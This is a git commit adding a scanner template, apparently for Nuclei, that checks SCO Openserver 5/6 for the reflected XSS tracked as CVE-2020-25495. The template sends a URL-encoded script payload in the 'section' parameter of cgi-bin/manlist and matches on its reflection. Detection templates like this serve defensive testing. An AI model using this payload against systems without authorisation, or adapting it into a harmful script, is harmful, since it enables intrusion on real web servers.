Merge pull request #1723 from Akokonunes/patch-8

Create CVE-2020-25495.yaml
2021-06-19 01:59:39 +05:30 · 2021-06-19 01:59:39 +05:30 · a20f1f2417
parent b4af3fda5b 55c1984a52
commit a20f1f2417
1 changed files with 30 additions and 0 deletions
--- a/cves/2020/CVE-2020-25495.yaml
+++ b/cves/2020/CVE-2020-25495.yaml
@ -0,0 +1,30 @@
+id: CVE-2020-25495
+
+info:
+  name: SCO Openserver 5.0.7 - 'section' Reflected XSS
+  author: 0x_Akoko
+  description: A reflected Cross-site scripting (XSS) vulnerability in Xinuo (formerly SCO) Openserver version 5 and 6 allows remote attackers to inject arbitrary web script or HTML tag via the parameter 'section'.
+  severity: medium
+  tags: cve,cve2020,sco,xss
+  reference: https://www.exploit-db.com/exploits/49300
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/cgi-bin/manlist?section=%22%3E%3Ch1%3Ehello%3C%2Fh1%3E%3Cscript%3Ealert(/{{randstr}}/)%3C%2Fscript%3E'
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "<h1>hello</h1><script>alert(/{{randstr}}/)</script>"
+        part: body
+
+      - type: word
+        words:
+          - "text/html"
+        part: header